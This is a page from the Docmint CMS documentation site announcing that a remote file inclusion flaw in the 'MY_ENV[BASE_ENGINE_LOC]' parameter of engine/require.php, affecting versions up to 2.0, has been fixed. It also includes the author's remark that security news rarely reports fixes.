Docmint - The Documentation CMS

Docmint - The Documentation CMS
Select your language:  
    Search:   
  Docmint - The Documentation CMS
  Bug Fixes and Security Issues
  Bug Fixed: docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Exploit
<Bug Fixes and Security Issues        Credits>
Print / Download:
Available languages: English Last update: 2007-08-09 11:46:05

Bug Fixed: docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Exploit

Docmint - The Documentation CMS   >   Introduction   >   Bug Fixes and Security Issues   >   Bug Fixed: docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Exploit

There was a big security issue in docmint, discovered in October 2006. It has been fixed. Here is a short description of the security issue:

Input passed to the "MY_ENV[BASE_ENGINE_LOC]" parameter in engine/require.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.
The vulnerability has been confirmed in the SVN version from 2006-10-10. Other versions may also be affected.
To the security advocates, reading this: it's great that security issues are being communicated widely. It's sad though to experience that a fixed security issue is apparently not communicated at all. I have reported the Bug Fix to various platforms and none have picked up on it. I guess - unfortunately - the security news is the same as any news: only bad news is good news.


add a note add a note User Contributed Notes
Bug Fixed: docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Exploit
There are no user contributed notes for this page.

<Bug Fixes and Security Issues Credits>
  Last update: 2007-08-09 11:46:05
Website powered by Docmint Last update: 2007-08-09 11:46:05
Total page time: 0.235249996185